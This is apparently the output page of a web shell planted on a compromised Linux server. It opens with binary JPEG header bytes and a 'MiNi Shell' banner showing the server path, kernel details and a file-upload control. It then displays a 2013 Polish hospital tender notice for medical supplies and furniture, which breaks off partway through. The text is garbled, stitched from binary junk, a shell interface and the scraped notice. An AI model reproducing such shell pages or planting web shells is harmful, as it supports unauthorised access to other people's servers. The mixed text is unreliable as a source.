JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131128/489542-N-2013.html

<p class="kh_header"><b>Gdynia: Przedmiotem niniejszego zamówienia są sukcesywne dostawy materiałów medycznych, środków myjąco-dezynfekujących oraz dostawa różnych urządzeń i produktów medycznych, mebli medycznych oraz mebli dla Szpitala Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni</b><br>
<b>Numer ogłoszenia: 489542 - 2013; data zamieszczenia: 28.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Św. Wincentego a Paulo Spółka z o.o. , ul. Wójta Radtkego 1, 81-348 Gdynia, woj. pomorskie, tel. 58 6207501, faks 58 6201114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalwincentego.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem niniejszego zamówienia są sukcesywne dostawy materiałów medycznych, środków myjąco-dezynfekujących oraz dostawa różnych urządzeń i produktów medycznych, mebli medycznych oraz mebli dla Szpitala Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia są sukcesywne dostawy materiałów medycznych, środków myjąco-dezynfekujących oraz dostawa różnych urządzeń i produktów medycznych, mebli medycznych oraz mebli dla Szpitala Św. Wincentego a Paulo Sp. z o.o. z siedzibą w Gdyni, w tym:
1) Narzędzia laryngologiczne wielorazowego użytku
2) Lusterka krtaniowe jednorazowe
3) Paski do glukometrów
4) Środki myjące do płuczko dezynfektorów
5) Prowadniczki do nefrotomii
6) Filtry powietrza do sterylizacji
7) Klamry wyciągowe
8) Szafki przyłóżkowe
9) Pionizator typu Dolomite StepUp lub równoważny
10) Wózek do przewożenia zwłok
11) Wózek zabiegowo-opatrunkowy
12) Wózek do czystej i brudnej bielizny
13) Szafa endoskopowa
14) Meble
2. Szczegółowy opis przedmiotu zamówienia, zestawienie wymaganych parametrów granicznych  oraz ilości poszczególnego asortymentu zawiera załącznik nr 1 b do SIWZ. W zakresie pakietów 9, 12, 14 opis przedmiotu zamówienia zawarty w zał. nr 1b należy czytać łącznie z rysunkami (wizualizacją) stanowiącymi załącznik nr 1c do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 24.45.50.00-8, 33.19.00.00-8, 42.51.43.10-9, 33.19.20.00-2, 33.14.17.20-3, 33.94.20.00-5, 34.91.21.00-4, 39.10.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do postępowania zobowiązany jest do wniesienia wadium w następującej wysokości, ustalonej odrębnie dla każdego z pakietów:
Pakiet 1 - 1.130,00 zł;
Pakiet 2 -    250,00 zł;
Pakiet 3 -    230,00 zł;
Pakiet 4 -    260,00 zł;
Pakiet 5 -    260,00 zł;
Pakiet 6 -    300,00 zł;
Pakiet 8 -    480,00 zł;
Pakiet 9 -    260,00 zł;
Pakiet 13 -  310,00 zł;
Pakiet 14 -  750,00 zł;
Pakiet 15 -  180,00 zł.
2. Wadium powinno być wniesione najpóźniej do chwili składania ofert.
3. Wadium może zostać wniesione w pieniądzu; poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2010 r. Nr 240, poz. 1603 z późn. zm.).
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: BNP Paribas Bank Polska S.A. PL 66 1600 1114 0004 0707 8076 0152 z podaniem tytułu wadium - przetarg znak: SW/ZP/251/N/71/2013 - DO - sukcesywne dostawy materiałów medycznych, środków myjąco-dezynfekujących oraz dostawa różnych urządzeń i produktów medycznych, mebli medycznych oraz mebli. Chwilą wniesienia wadium jest data uznania rachunku zamawiającego.
5. W przypadku wadium wnoszonego w formie niepieniężnej oryginał dokumentu należy złożyć w opisanej kopercie wraz z ofertą.
6. Dokument poręczenia/gwarancyjny powinien bezwzględnie przewidywać bezwarunkową, nieodwołalną i płatną na pierwsze żądanie utratę wadium na rzecz zamawiającego w przypadkach określonych w ust. 7.
7. Wykonawca traci wadium na rzecz Zamawiającego, wraz z odsetkami, w przypadku, gdy wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nieleżących po jego stronie oraz w przypadku, gdy wykonawca, którego oferta została wybrana:
1) odmówi podpisania umowy na warunkach określonych w ofercie;
2) nie wniesie zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy będzie niemożliwe z przyczyn leżących po stronie wykonawcy.
8. Wadium musi zabezpieczać ofertę w całym okresie związania ofertą, który wynosi 30 dni licząc od upływu terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Pakiet 1 - 7, 9 - certyfikat CE dla wyrobu medycznego;
2) Pakiet 8, 11 - deklaracja zgodności CE dla wyrobu medycznego.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany zawartej umowy będą wymagały, pod rygorem nieważności formy pisemnej w postaci aneksu, w zakresie ustalonym w załączonym do SIWZ wzorze umowy. Istotne zmiany umowy w stosunku do treści oferty, na podstawie której wyłoniono wykonawcę, mogą dotyczyć:
1) wynagrodzenia wykonawcy;
2) sposobu, miejsca i terminu realizacji zamówienia;
3) warunków płatności;
4) zmiany nazwy oferowanego wyrobu, przy zachowaniu jego parametrów w sytuacji, gdy zostanie wycofany z produkcji, lub wprowadzony do sprzedaży przez producenta wyrób zmodyfikowany/udoskonalony, przy czym zmiana ta nie może powodować wzrostu ceny zawartej w ofercie, 
5) wydłużenia terminu obowiązywania umowy, w sytuacji nie zrealizowania całego asortymentu będącego przedmiotem umowy w pierwotnym terminie. 
2. Zmiany, o których mowa w ust. 10 mogą być dokonane w następujących przypadkach:
1) ustawowej zmiany stawki podatku od towarów i usług (VAT),  przy czym zmianie ulegną wyłącznie ceny jednostkowe brutto, natomiast ceny jednostkowe  netto pozostaną bez zmian;
2) w zakresie, o którym mowa w ust. 10 pkt. 1, w przypadku:
a) zmian wprowadzonych przez producentów, obniżki marży;
b) zmian kursu waluty w przypadku towarów importowanych, zgodnie z tabelą NBP;
3) w przypadku zmiany przepisów prawa mających wpływ na warunki umowy
4) jeżeli zmiany nie spowodują negatywnych konsekwencji dla Zamawiającego.
3. Strona wnioskująca o zmianę umowy, przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalwincentego.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Św. Wincentego a Paulo Sp. z o.o. w Gdyni, ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamówień Publicznych bud. gospodarczy pok. nr 11..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2013 godzina 10:00, miejsce: Szpital Św. Wincentego a Paulo Sp. z o.o. w Gdyni, ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamówień Publicznych bud. gospodarczy pok. nr 11..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1 Narzędzia laryngologiczne (wielokrotnego użytku).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Narzędzia laryngologiczne (wielokrotnego użytku):
1. LUSTERKO KRTANIOWE  FIGURA 4 ŚREDNICA LUSTERKA 18 MM. - 30 szt.
2. LUSTERKO KRTANIOWE  FIGURA 5 ŚREDNICA LUSTERKA 20 MM. - 30 szt.
3. LUSTERKO KRTANIOWE  FIGURA 6 ŚREDNICA LUSTERKA 22 MM. - 30 szt.
4. LUSTERKO KRTANIOWE  FIGURA 7 ŚREDNICA LUSTERKA 24 MM. - 30 szt.
5. LUSTERKO KRTANIOWE  FIGURA 8 ŚREDNICA LUSTERKA 26 MM. - 30 szt.
6. LUSTERKO KRTANIOWE  FIGURA 9 ŚREDNICA LUSTERKA 28 MM. - 30 szt.
7. UCHWYT DO LUSTERKA KRTANIOWEGO OKRAGŁEGO DŁUGOŚĆ 110 MM - 10 szt.
8. WZIERNIK USZNY TYP HARTMANN DLA DOROSŁYCH ŚREDNICA 3,5MM. - 10 szt.
9. WZIERNIK USZNY TYP HARTMANN DLA DOROSŁYCH ŚREDNICA 5,0MM. - 20 szt.
10. WZIERNIK USZNY TYP HARTMANN DLA DOROSŁYCH ŚREDNICA 6,5MM. - 10 szt.
11. WZIERNIK USZNY TYP HARTMANN DLA DZIECI ŚREDNICA 3,2MM - 1 szt.
12. WZIERNIK USZNY TYP HARTMANN DLA DZIECI ŚREDNICA 4,6MM - 20 szt.
13. HACZYK ZAKRZYWIONY POD KĄTEM 90 STOPNI TĘPY Z KULKĄ DŁUGOŚĆ ZAGIĘCIA 4 MM DŁ. 150 MM - 10 szt.
14. DŹWIGNIA DO UCHA WAGENER #3 150MM - 10 szt.
15. DŹWIGNIA DO UCHA WAGENER #2 150MM - 10 szt.
16. HACZYK ZAKRZYWIONY POD KĄTEM 90 STOPNI TĘPY Z KULKĄ DŁUGOŚĆ ZAGIĘCIA 2.5 MM DŁ. 150 MM - 10 szt.
17. KANIULA SSĄCA FRAZIER ŚR.2,3MM - 5 szt.
18. KANIULA SSĄCA FRAZIER ŚR.2,7MM - 5 szt.
19. KANIULA SSĄCA FRAZIER ŚR.3,3MM - 5 szt.
20. KANIULA SSĄCA FRAZIER D:4,0MM - 5 szt.
21. LUSTERKO KRTANIOWE  FIGURA 1 ŚREDNICA LUSTERKA 12 MM. - 10 szt.
22. LUSTERKO KRTANIOWE  FIGURA 2 ŚREDNICA LUSTERKA 14 MM. - 10 szt.
23. NOŻYCZKI CHIRURGICZNE PROSTE OSTRO/OSTRE 130MM - 5 szt.
24. KANIULA SSACA TYP FERGUSSON Z MANDRYNEM ZAKRZYWIONA POD KĄTEM ŚREDNICA 1,5MM DŁ. KRZWIZNY 110MM - 10 szt.
25. KANIULA SSACA TYP FERGUSSON Z MANDRYNEM ZAKRZYWIONA POD KĄTEM ŚREDNICA 2,0MM DŁ. KRZWIZNY 110MM - 10 szt.
26. KANIULA SSACA TYP FERGUSSON Z MANDRYNEM ZAKRZYWIONA POD KĄTEM ŚREDNICA 2,5MM DŁ. KRZWIZNY 110MM. - 10 szt.
27. KANIULA SSACA TYP FERGUSSON Z MANDRYNEM ZAKRZYWIONA POD KĄTEM ŚREDNICA 3,0MM DŁ. KRZWIZNY 110MM. - 10 szt.
28. KANIULA SSACA TYP FERGUSSON Z MANDRYNEM ZAKRZYWIONA POD KĄTEM ŚREDNICA 4,0MM DŁ. KRZWIZNY 110MM - 10 szt.
29. PINCETA BAGNETOWA USZNA TYP LUCAE  DŁ. 140 MM - 10 szt.
30. PINCETA ADSON BAGNETOWĄTA 175MM - 10 szt.
31. PINCETA BAGNETOWA  ANATOMICZNA TYP JANSEN  DŁ.160 MM - 10 szt.
32. WZIERNIK NOSOWY  TYP HARTMANN-HALLE DŁUGOŚĆ. 155 MM ZŁĄCZE ROZBIERALNE DŁUGOŚĆ TRĄBKI 33,5 MM SZEROKOŚĆ KOŃCA TRĄBKI 7 MM - 10 szt.
33. WZIERNIK NOSOWY  TYP HARTMANN-HALLE DŁUGOŚĆ. 155 MM ZŁĄCZE ROZBIERALNE DŁUGOŚĆ TRĄBKI 30 MM SZEROKOŚĆ KOŃCA TRĄBKI 7 MM - 10 szt.
34. WZIERNIK NOSOWY  TYP KILLIAN DŁ. 145 MM ZŁĄCZE ROZBIERALNE DŁUGOŚĆ TRĄBKI 56 MMSZEROKOŚĆ KOŃCA TRĄBKI 7 MM - 2 szt.
35. WZIERNIK NOSOWY  TYP KILLIAN DŁ. 145 MM ZŁĄCZE ROZBIERALNE DŁUGOŚĆ TRĄBKI 75 MMSZEROKOŚĆ KOŃCA TRĄBKI 7 MM - 2 szt.
36. WANNA DO KONTENERA O WYMIARACH 300X274X135MM WYKONANA ZE STOPU ALUMINIUM Z ERGONOMICZNYMI UCHWYTAMI BLOKUJACYMI SIĘ POD  KATEM 90 STOPNI. WYPOSAŻONA W UCHWYTY NA  4 TABLICZKI IDENTYFIKACYJNE PO OBU STRONACH KONTENERA.  W WANNIE KOSZO SITO PERFOROWANE WYKONANE Z JEDNEGO KAWALKA STALI - 1 szt.
37. POKRYWA KONTENERA WYKONANA Z TERMOSTABILNEGO TWORZYWA DOSTOSOWANA DO WANNY KONTENERA O WYMIARZE 300X274MM PRZEZROCZYSTA, POSIADAJĄCA FILTR TEFLONOWY NA MIN. 5000 CYKLI STERYLIZACJI PAROWEJ. CAŁOŚC Z WANNĄ STANOWI KONTENER BEZOBSŁUGOWY. - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2  Jednorazowe sterylne lusterka krtaniowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jednorazowe sterylne lusterka krtaniowe - 6 000 szt.:
- długość rączki 148 mm lub dłuższe, białe
- średnica lusterka 19 mm  (+/- 3 mm)
- materiał: nie zawierający lateksu
- możliwość rozgrzania lusterka, aby uniknąć efektu parowania
- wykonania z polimeru, materiał powinien mieć właściwości termoabsorpcyjne, aby uniknąć poparzenia gardła pacjentów
- nie wymagającej dodatkowej rączki
- obraz powinien być odbity w wielkości rzeczywistej 1:1
- produkt powinien być jednoelementowy
- produkt powinien posiadać Atest Międzynarodowy do użytku
- pakowane pojedynczo
- data ważności.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Paski do glukometru kompatybilne z posiadanymi przez Zamawiającego glukometrami One Touch Select - 12 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4 Środki myjąco-dezynfekujące.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Środki myjąco-dezynfekujące
1. Środek myjący typu NEODISHER SBR EXTRA lub równoważny poj. 5 l.
Płynny, niepieniący środek myjący przeznaczony do maszynowego mycia basenów, kaczek i butelek na mocz w myjniach naczyń sanitarnych Usuwający także zaschnięte osady typu resztki mydła i wydalin ludzkich. - 35 szt.
2. Środek do płukania typu NEODISHER SBK lub równoważny poj. 5 l.
Lekko kwaśny środek płuczący ze specjalnymi komponentami zmiękczającymi do myjni naczyń sanitarnych, nie pozostawiający plam wodnych i osadów wapiennych na przedmiotach oraz wytwornicach pary i przewodach. - 35 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.45.50.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet  5 Prowadniczki do nefrostomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadniczki do nefrostomii
Prowadniczki jednorazowego użytku, kompatybilne z przystawką do nefrostomii i głowicą USG LOGIQ 500 PRO nr 901819 M3. Prowadniczki służą do nefrostomii i punkcji nerki. W skład zestawu wchodzi: prowadniczka z elementem mocującym do przystawki USG, osłonka na głowicę
i przewód, żel jałowy i małe 2 okrągłe gumeczki. Wszystko zawinięte w jałową serwetę. - 120 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6 Filtr powietrza do sterylizatora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filtr powietrza do sterylizatora typu GETINGE 669/1995 HS 6613 ER - 2/2006 (lub równoważny) - 22 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.51.43.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7 Klamry wyciągowe, chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KLAMRY WYCIĄGOWE, CHIRURGICZNE - 5 szt.
1.	Typ Kirschner - kształt litery U
2.	Szerokość wewnętrzna klamry przy równoległym ustawieniu jej ramion 82mm
3.	Maksymalne rozwarcie - 160 mm
4.	Wolna przestrzeń pomiędzy drutem Kirschnera a pokrętłem klamry 12cm
5.	Dwa połączone osiowo ramiona
6.	Na końcach ramion śruby zaciskowe
